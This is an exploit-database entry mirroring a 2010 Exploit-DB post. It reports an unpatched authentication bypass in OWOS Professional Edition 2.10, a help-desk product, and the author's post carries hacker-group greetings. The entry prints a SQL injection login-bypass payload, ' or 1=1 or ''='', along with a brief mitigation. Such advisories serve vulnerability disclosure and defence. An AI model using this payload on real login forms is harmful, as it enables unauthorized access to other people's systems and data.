header-logo
Suggest Exploit
vendor:
OWOS: Professional Edition
by:
L0rd CrusAd3r aka VSN
7,5
CVSS
HIGH
Authentication Bypass Vulnerability
287
CWE
Product Name: OWOS: Professional Edition
Affected Version From: 2.10
Affected Version To: 2.10
Patch Exists: NO
Related CWE: N/A
CPE: a:onlinetechtools:owos:2.10
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Onlinetechtools OWOS: Professional Edition? Authentication Bypass Vulnerability

Work smarter with OWOS: Professional Edition, the web-based help desk solution. OWOS Pro helps you simplify support requests, e-mail communication, organize planning and scheduling, and provide powerful access to the information you need. An attacker can bypass authentication by using the pattern ' or 1=1 or ''=''.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly validated.
Source

Exploit-DB raw data:

Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title: Onlinetechtools OWOS: Professional Edition? Authentication Bypass Vulnerability
Version:2.10
Price:900$
Vendor url:http://www.onlinetechtools.com
Published: 2010-11-02
Thanx to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic, M4n0j,SeeMe, Th3 RDX.
Greetz to : Inj3ct0r Exploit DataBase (inj3ct0r.com)
Special Greetz: Topsecure.net,0xr00t.com,Andhrahackers.com
Shoutzz:- To all ICW & Inj3ct0r members.
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Description:

Work smarter with OWOS: Professional Edition, the web-based help desk solution.
OWOS Pro helps you simplify support requests, e-mail communication, organize planning and scheduling,
and provide powerful access to the information you need. Code: ASP 3.0 & VBScript
?
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability:

*Authentication ByPass Vulnerability*

Pattern: ' or 1=1 or ''=''



.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
# 0day n0 m0re #
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~..~.~.~.~.~~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

-- 
With R3gards,
L0rd CrusAd3r

Navigation

Suggest Exploit

Services By CQR